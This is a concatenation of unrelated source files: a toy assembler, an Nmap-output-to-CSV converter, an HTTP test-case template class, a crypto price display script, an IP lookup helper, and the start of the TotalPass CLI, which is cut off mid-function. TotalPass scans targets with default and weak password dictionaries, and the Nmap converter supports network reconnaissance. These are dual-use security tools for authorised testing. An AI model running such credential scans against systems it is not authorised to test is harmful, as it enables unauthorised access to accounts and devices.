if(value[0] == '.'):
for character in value[1:]:
if character not in string.ascii_letters:
break
return tokenInfo(TYPES.LABEL, value)
return None
class Processor:
def __init__(self, initialParameters):
self.parameters = initialParameters
self.lines = []
self.tokens = []
self.dataBuffer = []
self.labels = {}
self.currentAddress = 0
self.readInputFile()
def tokenize(self):
for i in range(len(self.lines)):
self.parse(i+1, self.lines[i])
def readInputFile(self):
for line in self.parameters.inputFile:
self.lines.append(line)
self.parameters.inputFile.close()
def removeStartingWhitespaces(self, line, position, lineLength):
while position < lineLength and line[position] in '\t \n':
position += 1
return position
def getToken(self, lineNumber, line, position, lineLength):
text = ''
parametersDelimiters = '\t\n, '
# if not at the end of the line check if next argument is not a comma
if position < lineLength:
if line[position] == ',':
text = ','
position += 1
elif line[position] in '"\'':
delimiter = line[position]
isString = True
parametersDelimiters = '\t\n,'
text += '"'
position += 1
else:
isString = False
# if it's not a comma then process argument
if text != ',':
# ignore comments
if position < lineLength and line[position] == '#':
position = lineLength
while position < lineLength and line[position] not in parametersDelimiters:
text += line[position]
position += 1
if isString and line[position-1] == delimiter:
if (delimiter == '\''):
text = text[:-1] + '"'
break
if text != '':
token = Token(text, lineNumber)
self.tokens.append(token)
return position
def parse(self, lineNumber, line):
lineLength = len(line)
if lineLength == 0:
return False
position = 0
while position < lineLength:
position = self.removeStartingWhitespaces(
line, position, lineLength)
position = self.getToken(lineNumber, line, position, lineLength)
def process(self):
supportedFormats = {
'bin': BIN,
'elf': ELF
}
fileFormat = supportedFormats[self.parameters.fileFormat](
self.parameters)
fileFormat.generateTemplate()
self.currentAddress = fileFormat.getOrg()
self.index = 0
while self.index < len(self.tokens):
self.assemble()
# if file doesn't have .start label specified, set starting address to 0
try:
startingPoint = self.labels['.start']
except KeyError:
startingPoint = 0
self.dataBuffer = fileFormat.addFormatData(
self.dataBuffer, startingPoint)
def write(self):
if len(self.dataBuffer) == 0:
raise AssemblerException('Empty write buffer, nothing to write')
self.parameters.outputFile.write(bytes(self.dataBuffer))
self.parameters.outputFile.close()
def assemble(self):
index = self.index
token = self.tokens[index]
if token.type != TYPES.INSTRUCTION and token.type != TYPES.LABEL:
raise AssemblerException('Unexpected token of type ' + str(token.type) +
', value: ' +
str(token.value) + ' in line: ' +
str(token.lineNumber))
self.index += 1
usedArguments = 0
if token.type == TYPES.LABEL:
self.labels[token.value] = self.currentAddress
print(token.value, self.currentAddress)
return
if token.value == 'DB':
usedArguments += self.insertValue(1, usedArguments)
elif token.value == 'DW':
usedArguments += self.insertValue(2, usedArguments)
elif token.value == 'DD':
usedArguments += self.insertValue(4, usedArguments)
elif token.value == 'DQ':
usedArguments += self.insertValue(8, usedArguments)
else:
raise AssemblerException('unknown instruction ' + str(token.value) +
' in line: ' + str(token.lineNumber))
self.index += usedArguments
def insertValue(self, length, offset, recursive=False):
index = self.index + offset
argument = self.tokens[index]
if argument.type == TYPES.STRING:
counter = 0
for character in argument.value[1:-1]:
counter += 1
self.dataBuffer += bytearray(
ord(character).to_bytes(1, byteorder=self.parameters.endianess))
if counter % length != 0:
self.dataBuffer += bytearray(int(0).to_bytes(length - counter %
length, byteorder=self.parameters.endianess))
self.currentAddress += counter + (length - counter) % length
elif argument.type == TYPES.INT:
self.dataBuffer += bytearray(argument.value.to_bytes(
length, byteorder=self.parameters.endianess))
self.currentAddress += length
else:
raise AssemblerException('Wrong argument type: ' + str(argument.type) +
', value: ' +
str(argument.value) + ' in line: ' +
str(argument.lineNumber))
try:
nextToken = self.tokens[self.index+offset + 1]
# if next argument is comma then there is another argument waiting to be printed
if nextToken.type == TYPES.COMMA:
return self.insertValue(length, offset + 2, True)
except IndexError:
pass
# necessary for correct index calculation
if recursive:
return offset + 1
return 1
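# Illustrative behaviour (made-up source lines, derived from the logic above):
# DW "ABC" -> emits 0x41 0x42 0x43 0x00 (string padded to a 2-byte multiple)
# DB 10, 0x20 -> emits 0x0A 0x20 and consumes three tokens (value, comma, value)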
``` |
{
"source": "0xgregor/axiom",
"score": 2
} |
#### File: axiom/interact/nmaptocsv.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Global imports
import sys
import re
import csv
import struct
import socket
import itertools
import argparse
import xml.etree.cElementTree as ET
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
izip = itertools.izip
fd_read_options = 'rb'
fd_write_options = 'wb'
else:
izip = zip
fd_read_options = 'r'
fd_write_options = 'w'
# Script version
VERSION = '1.6'
# Options definition
parser = argparse.ArgumentParser()
# Options definition
mandatory_grp = parser.add_argument_group('Mandatory parameters')
mandatory_grp.add_argument('-i', '--input', help = 'Nmap scan output file in normal (-oN) or Grepable (-oG) format (stdin if not specified)')
mandatory_grp.add_argument('-x', '--xml-input', help = 'Nmap scan output file in XML (-oX) format')
output_grp = parser.add_argument_group('Output parameters')
output_grp.add_argument('-o', '--output', help = 'CSV output filename (stdout if not specified)')
output_grp.add_argument('-f', '--format', help = 'CSV column format { fqdn, rdns, hop_number, ip, mac_address, mac_vendor, port, protocol, os, script, service, version } (default: ip-fqdn-port-protocol-service-version)', default = 'ip-fqdn-port-protocol-service-version')
output_grp.add_argument('-S', '--script', help = 'Adds the script column in output, alias for -f "ip-fqdn-port-protocol-service-version-script"', action = 'store_const', const = 'ip-fqdn-port-protocol-service-version-script')
output_grp.add_argument('-d', '--delimiter', help = 'CSV output delimiter (default ";"). Ex: -d ","', default = ';')
output_grp.add_argument('-n', '--no-newline', help = 'Do not insert a newline between each host. By default, a newline is added for better readability', action = 'store_true', default = False)
output_grp.add_argument('-s', '--skip-header', help = 'Do not print the CSV header', action = 'store_true', default = False)
# Handful patterns
#-- IP regex
p_ip_elementary = r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
p_mac_elementary = r'[0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F]'
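# Note: p_mac_elementary deliberately omits its outer parentheses; they are
# supplied by the wrapping "(%s)" group when it is interpolated into p_mac
# below, yielding the balanced pattern
# ([0-9a-fA-F][0-9a-fA-F]:){5}([0-9a-fA-F][0-9a-fA-F]).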
# Nmap Normal Output patterns
#-- Target
p_ip_nmap5 = r'Interesting.*on\s(?:(?P<fqdn_nmap5>.*) (?=\((?P<ip_nmap5>%s)\)))|Interesting.*on\s(?P<ip_only_nmap5>.*)\:' % p_ip_elementary
p_ip_nmap6 = r'Nmap.*for\s(?:(?P<fqdn_nmap6>.*) (?=\((?P<ip_nmap6>%s)\)))|Nmap.*for\s(?P<ip_only_nmap6>%s)$' % (p_ip_elementary, p_ip_elementary)
p_ip = re.compile('%s|%s' % (p_ip_nmap5, p_ip_nmap6))
#-- rDNS
p_rdns = re.compile(r'rDNS record for (?P<ip>%s):\s(?P<rdns>.*)$' % p_ip_elementary)
#-- Port header
p_port_header = re.compile(r'^(?P<port>PORT)\s+(?P<state>STATE)\s+(?P<service>SERVICE)\s+(?P<reason>REASON\s*)?(?P<version>VERSION$)?')
#-- Port finding
p_port_without_reason = re.compile(r'^(?P<number>[\d]+)\/(?P<protocol>tcp|udp)\s+(?:open|open\|filtered)\s+(?P<service>[\w\S]*)(?:\s*(?P<version>.*))?$')
p_port_with_reason = re.compile(r'^(?P<number>[\d]+)\/(?P<protocol>tcp|udp)\s+(?:open|open\|filtered)\s+(?P<service>[\w\S]*)\s+(?P<reason>.* ttl [\d]+)\s*(?:\s*(?P<version>.*))$')
#-- Script output finding
p_script = re.compile(r'^\|[\s|\_](?P<script>.*)$')
#-- MAC address
p_mac = re.compile(r'MAC Address:\s(?P<mac_addr>(%s))\s\((?P<mac_vendor>.*)\)' % p_mac_elementary)
#-- OS detection (pattern order is important, the latter position the more precise and reliable the information is)
p_os = re.compile(r'(?:^Service Info: OS|^OS CPE|\s+OS|^OS details|smb-os-discovery|\|):\s(?P<os>[^;]+)')
#-- Network distance
p_network_dist = re.compile(r'Network Distance:\s(?P<hop_number>\d+)\shops?')
# Nmap Grepable output
#-- Target, Ports
p_grepable = re.compile(r'(?P<whole_line>^Host:\s.*)')
# Handful functions
def dottedquad_to_num(ip):
"""
Convert decimal dotted quad string IP to long integer
"""
return struct.unpack('!L',socket.inet_aton(ip))[0]
def num_to_dottedquad(n):
"""
Convert long int IP to dotted quad string
"""
return socket.inet_ntoa(struct.pack('!L',n))
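# Examples: dottedquad_to_num('192.168.0.1') == 3232235521
#           num_to_dottedquad(3232235521) == '192.168.0.1'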
def unique_match_from_list(list):
"""
Check the list for a potential pattern match
@param list : a list of potential matching groups
@rtype : return the string representation of the unique value that matched, or nothing if nothing matched
"""
result = ''
for item in list:
if item != None:
result = str(item)
return result
def extract_matching_pattern(regex, group_name, unfiltered_list):
"""
Return the desired group_name from a list of matching patterns
@param regex : a regular expression with named groups
@param group_name : the desired matching group name value
@param unfiltered_list : a list of matches
@rtype : the string value
"""
result = ''
filtered_list = list(filter(regex.search, unfiltered_list))
if len(filtered_list) == 1:
filtered_string = ''.join(filtered_list)
result = regex.search(filtered_string).group(group_name)
return result
class Host:
def __init__(self, ip, fqdn=''):
self.ip_dottedquad = ip
self.ip_num = dottedquad_to_num(ip)
self.fqdn = fqdn
self.rdns = ''
self.ports = []
self.os = ''
self.mac_address = ''
self.mac_address_vendor = ''
self.network_distance = ''
def add_port(self, port):
self.ports.append(port)
# Getters
def get_ip_num_format(self):
return str(self.ip_num)
def get_ip_dotted_format(self):
return str(self.ip_dottedquad)
def get_fqdn(self):
return str(self.fqdn)
def get_rdns_record(self):
return str(self.rdns)
def get_port_list(self):
return self.ports
def get_port_number_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_number())
return result
def get_port_protocol_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_protocol())
return result
def get_port_service_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_service())
return result
def get_port_version_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_version())
return result
def get_port_script_list(self):
if not(self.get_port_list()):
return ['']
else:
result = []
for port in self.get_port_list():
result.append(port.get_script())
return result
def get_os(self):
return str(self.os)
def get_mac_address(self):
return str(self.mac_address)
def get_mac_address_vendor(self):
return str(self.mac_address_vendor)
def get_network_distance(self):
return str(self.network_distance)
# Setters
def set_fqdn(self, fqdn):
self.fqdn = fqdn
def set_rdns_record(self, rdns_record):
self.rdns = rdns_record
def set_os(self, os):
self.os = os
def set_mac(self, mac_address, mac_address_vendor = ''):
self.mac_address = mac_address
self.mac_address_vendor = mac_address_vendor
def set_network_distance(self, network_distance):
self.network_distance = network_distance
class Port:
def __init__(self, number, protocol, service='', version='', script=''):
self.number = number
self.protocol = protocol
self.service = service
self.version = version
self.script = script
def get_number(self):
return self.number
def get_protocol(self):
return self.protocol
def get_service(self):
return self.service
def get_version(self):
return self.version
def get_script(self):
return self.script.strip()
def set_service(self, service):
self.service = service
def set_version(self, version):
self.version = version
def set_script(self, script):
self.script = script
def split_grepable_match(raw_string):
"""
Split the raw line to a neat Host object
@param raw_string : the whole 'Host' line
@rtype : return an Host object
"""
global p_ip_elementary
splitted_fields = raw_string.split("\t")
# Patterns
p_host = re.compile(r'Host:\s(?P<ip>%s)\s+\((?P<fqdn>|.*)\)' % p_ip_elementary)
p_ports = re.compile(r'Ports:\s+(?P<ports>.*)/')
p_os = re.compile(r'OS:\s(?P<os>.*)')
# Extracted named-group matches
IP_str = extract_matching_pattern(p_host, 'ip', splitted_fields)
FQDN_str = extract_matching_pattern(p_host, 'fqdn', splitted_fields)
ports_str = extract_matching_pattern(p_ports, 'ports', splitted_fields)
OS_str = extract_matching_pattern(p_os, 'os', splitted_fields)
current_host = Host(IP_str, FQDN_str)
current_host.set_os(OS_str)
# Let's split the raw port list
all_ports = ports_str.split(', ')
# Keep only open ports
open_ports_list = filter(lambda p: '/open/' in p, all_ports)
for open_port in open_ports_list:
# Extract each field from the format [port number / state / protocol / owner / service / rpc info / version info]
# -- Thanks to http://www.unspecific.com/nmap-oG-output/
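# Illustrative (hypothetical) entry: '22/open/tcp//ssh//OpenSSH 7.6p1/'
# splits into number='22', state='open', protocol='tcp', owner='',
# service='ssh' and version='/OpenSSH 7.6p1/', which the strip('/') below
# reduces to 'OpenSSH 7.6p1'.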
number, state, protocol, owner, service, version = open_port.split('/', 5)
# remove potential leading and trailing slashes on version
version = version.strip('/')
new_port = Port(number, protocol, service, version)
current_host.add_port(new_port)
return current_host
def parse(fd):
"""
Parse the data according to several regexes
@param fd : input file descriptor, could be a true file or stdin
@rtype : return a list of <Host> objects indexed from their numerical IP representation
"""
global p_ip_elementary, p_ip, p_port_without_reason, p_port_with_reason, p_grepable, p_script, p_mac, p_os, p_network_dist, p_rdns
IPs = {}
last_host = None
p_port = p_port_without_reason
in_script_line = False
script = ''
lines = [l.rstrip() for l in fd.readlines()]
for line in lines:
# 1st case: Nmap Normal Output
#-- 1st action: Grab the IP
IP = p_ip.search(line)
if IP:
# Check out what patterns matched
IP_potential_match = [IP.group('ip_nmap5'), IP.group('ip_only_nmap5'), IP.group('ip_nmap6'), IP.group('ip_only_nmap6')]
IP_str = unique_match_from_list(IP_potential_match)
FQDN_potential_match = [IP.group('fqdn_nmap5'), IP.group('fqdn_nmap6')]
FQDN_str = unique_match_from_list(FQDN_potential_match)
new_host = Host(IP_str, FQDN_str)
IPs[new_host.get_ip_num_format()] = new_host
last_host = new_host
# 1st case: Nmap Normal Output
#-- 2nd action: Check if there is a rDNS record
rDNS = p_rdns.search(line)
if rDNS:
if rDNS.group('ip') and rDNS.group('rdns'):
rdns_ip_num_format = str(dottedquad_to_num(rDNS.group('ip')))
if rdns_ip_num_format in IPs.keys():
IPs[rdns_ip_num_format].set_rdns_record(rDNS.group('rdns'))
# 1st case: Nmap Normal Output
#-- 3rd action: Check the port header, to know if there is a reason column
port_header = p_port_header.search(line)
if port_header:
if port_header.group('reason'):
p_port = p_port_with_reason
else:
p_port = p_port_without_reason
# 1st case: Nmap Normal Output
#-- 4th action: Grab the script output
script_line = p_script.search(line)
if script_line:
in_script_line = True
script = script + script_line.group('script') + '\n'
else:
# We were in a script output section, now it's finished
if in_script_line:
last_port = last_host.get_port_list()[-1]
last_port.set_script(script)
# reseting trackers
in_script_line = False
script = ''
# 1st case: Nmap Normal Output
#-- 5th action: Grab the port
port = p_port.search(line)
if port and last_host != None:
number = str(port.group('number'))
protocol = str(port.group('protocol'))
service = str(port.group('service'))
version = str(port.group('version'))
new_port = Port(number, protocol, service, version)
last_host.add_port(new_port)
# 1st case: Nmap Normal Output
#-- 6th action: Grab the MAC address
mac = p_mac.search(line)
if mac:
last_host.set_mac(str(mac.group('mac_addr')), str(mac.group('mac_vendor')))
# 1st case: Nmap Normal Output
#-- 7th action: Grab the OS detection
os = p_os.search(line)
if os:
last_host.set_os(str(os.group('os')))
# 1st case: Nmap Normal Output
#-- 8th action: Grab the network distance
network_distance = p_network_dist.search(line)
if network_distance:
last_host.set_network_distance(str(network_distance.group('hop_number')))
# 2nd case: Nmap Grepable Output
#-- 1 sole action: Grab the whole line for further splitting
grepable = p_grepable.search(line)
if grepable:
if grepable.group('whole_line'):
new_host = split_grepable_match(grepable.group('whole_line'))
# Update the occurence found with 'Status: Up'
IPs[new_host.get_ip_num_format()] = new_host
last_host = new_host
return IPs
def parse_xml(xml_file):
"""
Parse the XML file
@param xml_file : the input file
@rtype : return a list of <Host> objects indexed from their numerical IP representation
"""
IPs = {}
try:
tree = ET.ElementTree(file=xml_file)
root = tree.getroot()
except ET.ParseError as e:
print("[!] An error has occurred while parsing the XML file: '%s'.\nExiting" % e)
return None
for host in root.findall('host'):
if 'up' in host.find('status').get('state'):
# IP, MAC
addresses = host.findall('address')
for address in addresses:
if 'ipv4' in address.get('addrtype') and address.get('addr'):
ip_dottedquad = address.get('addr')
new_host = Host(ip_dottedquad)
if 'mac' in address.get('addrtype'):
mac_addr = address.get('addr')
mac_vendor = address.get('vendor')
new_host.set_mac(mac_addr, mac_vendor)
# FQDN, RDNS
hostnames = host.findall('./hostnames/hostname')
for hostname in hostnames:
if hostname.get('name') and 'user' in hostname.get('type'):
new_host.set_fqdn(hostname.get('name'))
if hostname.get('name') and 'PTR' in hostname.get('type'):
new_host.set_rdns_record(hostname.get('name'))
# Ports (protocol, number, service, version) and script output
open_ports = host.findall("./ports/port/state[@state='open']/..")
for port in open_ports:
protocol = port.get('protocol')
number = port.get('portid')
new_port = Port(number, protocol)
service = port.find('service')
if service != None:
service_name = service.get('name') if service.get('name') else ''
service_product = service.get('product') if service.get('product') else ''
service_version = service.get('version') if service.get('version') else ''
service_extrainfo = service.get('extrainfo') if service.get('extrainfo') else ''
version = ("%s %s %s" % (service_product, service_version, service_extrainfo)).strip()
new_port.set_service(service_name)
new_port.set_version(version)
scripts = port.findall('script')
script_output = ''
for script in scripts:
script_output = script_output + "\n%s: %s" % (script.get('id'), script.get('output'))
new_port.set_script(script_output)
new_host.add_port(new_port)
# OS
osmatches = host.findall('./os/osmatch')
os = "|".join(osmatch.get('name') for osmatch in osmatches)
new_host.set_os(os)
# Hop
hop_number = len(host.findall('./trace/hop'))
new_host.set_network_distance(hop_number)
IPs[new_host.get_ip_num_format()] = new_host
return IPs
def is_format_valid(fmt):
"""
Check for the supplied custom output format
@param fmt : the supplied format
@rtype : True or False
"""
supported_format_objects = [ 'fqdn', 'rdns', 'hop_number', 'ip', 'mac_address', 'mac_vendor', 'port', 'protocol', 'os', 'script', 'service', 'version' ]
unknown_items = []
for fmt_object in fmt.split('-'):
if not(fmt_object in supported_format_objects):
unknown_items.append(fmt_object)
if unknown_items:
return False, unknown_items
else:
return True, None
def formatted_item(host, format_item):
"""
return the attribute value related to the host
@param host : host object
@param format_item : the attribute supplied in the custom format
@rtype : the <list> attribute value
"""
if isinstance(host, Host):
option_map = {
'fqdn': [host.get_fqdn()],
'rdns': [host.get_rdns_record()],
'hop_number': [host.get_network_distance()],
'ip': [host.get_ip_dotted_format()],
'mac_address': [host.get_mac_address()],
'mac_vendor': [host.get_mac_address_vendor()],
'os': [host.get_os()],
'port': host.get_port_number_list(),
'protocol': host.get_port_protocol_list(),
'service': host.get_port_service_list(),
'version': host.get_port_version_list(),
'script': host.get_port_script_list()
}
if format_item in option_map.keys():
return option_map[format_item]
else:
return ''
else:
return []
def repeat_attributes(attribute_list):
"""
Repeat each attribute list so that they can be zipped to equal length
@param attribute_list : raw list of attribute lists of differing lengths
@rtype : a list of equal-length attribute lists
"""
max_number = len(max(attribute_list, key=len))
attribute_list = map(lambda x: x * max_number, attribute_list)
return attribute_list
def generate_csv(fd, results, options):
"""
Generate a plain ';' separated csv file with the desired or default attribute format
@param fd : output file descriptor, could be a true file or stdout
"""
if results:
spamwriter = csv.writer(fd, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
splitted_options_format = options.format.split('-')
if not options.skip_header:
csv_header = [format_item.upper() for format_item in splitted_options_format]
spamwriter.writerow(csv_header)
# for IP in sorted(results.iterkeys())
for IP in sorted(results):
formatted_attribute_list = []
for index,format_item in enumerate(splitted_options_format):
item = formatted_item(results[IP], format_item)
formatted_attribute_list.insert(index, item)
formatted_attribute_list = repeat_attributes(formatted_attribute_list)
for line_to_write in izip(*formatted_attribute_list):
spamwriter.writerow(list(line_to_write))
# Print a newline if asked
if not options.no_newline:
spamwriter.writerow('')
return
def main():
global parser
options = parser.parse_args()
# Supplied format
if options.script:
options.format = options.script
valid_format, unknown_items = is_format_valid(options.format)
if not valid_format:
parser.error("Please specify a valid output format: '%s' is invalid \n\
Supported objects are { fqdn, rdns, hop_number, ip, mac_address, mac_vendor, port, protocol, os, script, service, version }" % ', '.join(unknown_items))
# Input selection
if (options.input != None) and (options.xml_input != None):
parser.error("Please specify either a normal/grepable or an XML input file")
elif (options.input == None) and (options.xml_input != None):
results = parse_xml(options.xml_input)
elif options.xml_input == None:
if options.input != None:
fd_input = open(options.input, fd_read_options)
else:
# No input file specified, reading from stdin
fd_input = sys.stdin
# Analysis
results = parse(fd_input)
fd_input.close()
# Output descriptor
if options.output != None:
fd_output = open(options.output, fd_write_options)
else:
# No output file specified, writing to stdout
fd_output = sys.stdout
# CSV output
generate_csv(fd_output, results, options)
fd_output.close()
return
if __name__ == "__main__":
main()
``` |
{
"source": "0xh4di/httpninja",
"score": 2
} |
#### File: httpninja/Testing/testcase_definition.py
```python
from string import Template
import os
import re
class TestcaseObject(object):
_rawTemplate = ''
templateRequest = Template('')
selectRegExFromRequest = ''
flagRegExStrInResponse = ''
inverseFlag = False
description = ''
timeout = 0
isEnabled = True
isRateLimited = False
sendInitialChars = 0
sendBodyCharRate = 1
delayInBetween = 0
autoContentLength = False
# The class "constructor" - It's actually an initializer
def __init__(self, rawTemplate='',selectRegExFromRequest='',flagRegExStrInResponse='', inverseFlag=False,description='' ,isEnabled=True,timeout=0,
isRateLimited=False, sendInitialChars=0, sendBodyCharRate=1, delayInBetween=0, autoContentLength=False):
self._rawTemplate = rawTemplate
self.selectRegExFromRequest = selectRegExFromRequest
self.flagRegExStrInResponse = flagRegExStrInResponse
self.inverseFlag = inverseFlag
self.description = description
self.isEnabled = isEnabled
self.timeout = timeout
self.isRateLimited = isRateLimited
self.sendInitialChars = sendInitialChars
self.sendBodyCharRate = sendBodyCharRate
self.delayInBetween = delayInBetween
self.autoContentLength = autoContentLength
self._setParams()
def _setParams(self):
self.templateRequest = Template(self._rawTemplate)
def ReqBuilder(self, target_BoxObject):
filename, extension = os.path.splitext(target_BoxObject.path)
extension = extension[1:] # removing the dot character before the extension
result = self.templateRequest.safe_substitute(ip=target_BoxObject.ip,
port=target_BoxObject.port,
path=target_BoxObject.path,
filename=filename,
extension=extension,
hostname=target_BoxObject.hostname,
description=target_BoxObject.description)
if self.autoContentLength:
bodylength = len(result) - re.search("(\r\n\r\n)|(\n\n)", result).end()
if re.search("content\\-length", result, re.IGNORECASE):
result = re.sub(r"(?i)content\-length:\s*\d+", "Content-Length: " + str(bodylength),
result, 1)
else:
result = re.sub(r"(\r\n\r\n)|(\n\n)", "\r\nContent-Length: " + str(bodylength) + "\r\n\r\n",
result, 1)
return result
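# Illustrative example (hypothetical template, not from the project): for a
# rendered request ending in "\r\n\r\ntest", autoContentLength computes
# bodylength = 4 and either rewrites an existing Content-Length header to
# "Content-Length: 4" or inserts one just before the blank line that
# separates headers from the body.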
``` |
{
"source": "0xhackworth/zero-crypto-screen",
"score": 3
} |
#### File: 0xhackworth/zero-crypto-screen/main.py
```python
import json
import time
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen
import itertools
from config.builder import Builder
from config.config import config
from logs import logger
from presentation.observer import Observable
SCREEN_REFRESH_INTERVAL = 9600
DATETIME_FORMAT = "%Y-%m-%dT%H:%M"
def get_dummy_data():
logger.info('Generating dummy data')
# Static OHLC rows ([timestamp, open, high, low, close]); illustrative values so the chart can render without network access.
return [[0, 100.0, 110.0, 90.0, 105.0], [1, 105.0, 120.0, 100.0, 115.0], [2, 115.0, 118.0, 98.0, 102.0]]
def fetch_prices(token):
logger.info('Fetching prices')
url = f'https://api.coingecko.com/api/v3/coins/{token}/ohlc?vs_currency={config.currency}&days={config.days}'
req = Request(url)
data = urlopen(req).read()
prices = json.loads(data)
#external_data = json.loads(data)
#prices = [entry[1:] for entry in external_data]
return prices
def main():
logger.info('Initialize')
data_sink = Observable()
builder = Builder(config)
builder.bind(data_sink)
coins = config.cryptocurrencies.split(',')
refresh_bucket = 0
try:
for coin in itertools.cycle(coins):
try:
if refresh_bucket > SCREEN_REFRESH_INTERVAL:
data_sink.screenrefresh_observers()
refresh_bucket = 0
prices = [entry[1:] for entry in get_dummy_data()] if config.dummy_data else fetch_prices(coin.split(':')[0])
data_sink.update_observers(coin.split(':')[1], prices)
refresh_bucket = refresh_bucket + config.refresh_interval
time.sleep(config.refresh_interval)
except (HTTPError, URLError) as e:
logger.error(str(e))
time.sleep(5)
except IOError as e:
logger.error(str(e))
except KeyboardInterrupt:
logger.info('Exit')
data_sink.screenrefresh_observers()
data_sink.close()
exit()
if __name__ == "__main__":
main()
``` |
{
"source": "0xhexdec/UltimateKeyboardCreator",
"score": 3
} |
#### File: 0xhexdec/UltimateKeyboardCreator/Utils.py
```python
from .KeyboardData import KeyboardObject
from .Types import KeyboardKey, SupportDirection
# keyboardObjecttype
# 0 = normal switch
# 1 = stabalizer foot
def updateLayoutData(keyboardObject: KeyboardObject):
keys = 0
for row in keyboardObject.layoutData:
key: KeyboardKey
for key in row:
keys += 1
if keyboardObject.doubleSwitchForSpace and key.width >= 4:
key.isMultiSwitch = True
key.switches.clear()
key.switches.append((key.x - (key.width / 4), key.y))
key.switches.append((key.x + (key.width / 4), key.y))
keys += 1
elif key.height >= keyboardObject.supportKeySize:
key.support = SupportDirection.VERTICAL
key.supports.clear()
key.supports.append((key.x, key.y - keyboardObject.supportSizes[key.height]))
key.supports.append((key.x, key.y + keyboardObject.supportSizes[key.height]))
elif key.width >= keyboardObject.supportKeySize:
key.support = SupportDirection.HORIZONTAL
key.supports.clear()
key.supports.append((key.x - keyboardObject.supportSizes[key.width], key.y))
key.supports.append((key.x + keyboardObject.supportSizes[key.width], key.y))
else:
key.isMultiSwitch = False
key.support = SupportDirection.NONE
None
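# Illustrative example (made-up values, assuming supportKeySize is 2): with
# doubleSwitchForSpace enabled, a 6.25u-wide spacebar at (x, y) gets two
# switches at (x - 6.25/4, y) and (x + 6.25/4, y); a 2u-wide key instead gets
# two stabilizer supports offset by supportSizes[2] along its long axis.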
``` |
{
"source": "0xhh/TinyE8",
"score": 3
} |
#### File: 0xhh/TinyE8/eas.py
```python
import sys
def assemble(inFilename, outFilename):
#instruction set
instructions = {
"NOP" : 0x0,
"LDA" : 0x1,
"ADD" : 0x2,
"SUB" : 0x3,
"STA" : 0x4,
"LDI" : 0x5,
"JMP" : 0x6,
"JC" : 0x7,
"JZ" : 0x8,
"OUT" : 0xE,
"HLT" : 0xF
}
#open the asm file
try:
f = open(inFilename, "r")
except:
print(f"Error: {inFilename} file not found.")
#copy the whole file into a buffer and close the file
buffer = f.read()
f.close()
#split the buffer based on new lines, we will have a list of instructions
tokens = buffer.split("\n")
#output buffer
output = []
#iterate through the tokens, convert them to hexadecimal
#values based on instruction set and append it to output
for i in range(16):
try:
ins = tokens[i].split(" ")
if(ins[0] in instructions):
if(len(ins)==1):
output.append(hex(instructions[ins[0]]<<4 | 0 ))
#print(hex(instructions[ins[0]]<<4 | 0 ))
else:
output.append(hex(instructions[ins[0]]<<4 | int(ins[1])))
#print(hex(instructions[ins[0]]<<4 | int(ins[1])))
else:
if(len(ins)==1):
output.append(hex(int(ins[0])))
#print(hex(int(ins[0])))
except Exception as e:
output.append(hex(0))
#write the output buffer to a bin file by converting it into to bytes
with open(outFilename, "wb") as f:
for i in output:
print(i)
f.write(bytes((int(i,16),)))
f.close()
if(len(sys.argv) != 4):
print("Usage: python3 eas.py <asm filename> -o <bin filename>")
exit()
inFilename = sys.argv[1]
outFilename = sys.argv[3]
assemble(inFilename, outFilename)
``` |
{
"source": "0xHJK/ipip",
"score": 3
} |
#### File: ipip/addons/ip138.py
```python
import requests
from pyquery import PyQuery as pq
from ..settings import opts
API = "https://2021.ip138.com/"
def myip() -> str:
""" 查本机IP """
try:
r = requests.get(API, headers=opts.fake_headers)
d = pq(r.text)
return d(d("p")[0]).text()
except Exception as e:
return "0.0.0.0"
def ipinfo(ip) -> str:
try:
pass
except Exception as e:
return "%s query failed." % ip
```
#### File: ipip/addons/qqwry.py
```python
import ipdb
from ..settings import opts
DB = ipdb.City(opts.ipdbfile)
def ipinfo(ip) -> str:
""" 查找单个IP """
ip = ip.strip()
try:
return "%s, %s" % (ip, ", ".join(DB.find(ip.strip(), "CN")))
except Exception as e:
return "%s query failed." % ip
def ipbatch(ipaddrs) -> list:
""" 查找多个IP """
return [ipinfo(ip) for ip in ipaddrs]
``` |
{
"source": "0xHJK/TotalPass",
"score": 2
} |
#### File: TotalPass/totalpass/__main__.py
```python
import os
import sys
import logging
import click
from prettytable import PrettyTable
from .core import TPCore
from .passwd import Passwd
from .target import Target
from .settings import opts
from .__version__ import __version__
def banner():
return (
"\nTotalPass %s created by HJK.\nhttps://github.com/0xHJK/TotalPass\n"
% __version__
)
@click.group()
@click.version_option(message=banner())
def main():
print(banner())
@main.command()
def list():
""" 列出所有支持的设备信息和服务类型 """
TPCore.anylist()
@main.command()
def update():
""" 从 cirt.net 更新密码库"""
TPCore.anyupdate()
@main.command()
@click.argument("keywords", nargs=-1, required=True)
@click.option("-v", "--verbose", count=True, help="详细输出模式")
def search(keywords, verbose):
""" 从密码库中搜索密码 """
TPCore.anysearch(keywords, verbose)
@main.command()
@click.argument("target", nargs=-1, required=True)
@click.option("-x", "--name", help="指定设备型号或品牌")
@click.option("-c", "--category", multiple=True, help="指定扫描类型")
@click.option("-p", "--port", type=int, help="指定扫描端口")
@click.option("-d", "--dirname", help="指定字典目录或文件")
@click.option("--common", is_flag=True, default=False, help="使用常见弱口令字典")
@click.option("-t", "--threads", default=10, type=int, help="指定线程数量")
@click.option("-v", "--verbose", count=True, help="详细输出模式")
def scan(target, name, common, category, port, dirname, threads, verbose):
""" 指定目标进行密码扫描 """
if verbose < 1:
level = logging.WARNING
elif verbose < 2:
level = logging.INFO
else:
level = logging.DEBUG
logging.basicConfig(
level=level,
format="[%(asctime)s] %(levelname)-8s | %(msg)s ",
datefmt="%H:%M:%S",
)
opts.threads = threads
if name:
opts.name = name
if common:
opts.common = "common"
if category:
opts.categories = category
else:
from . import addons
opts.categories = addons.__all__
opts.port = port
if dirname and os.path.exists(dirname):
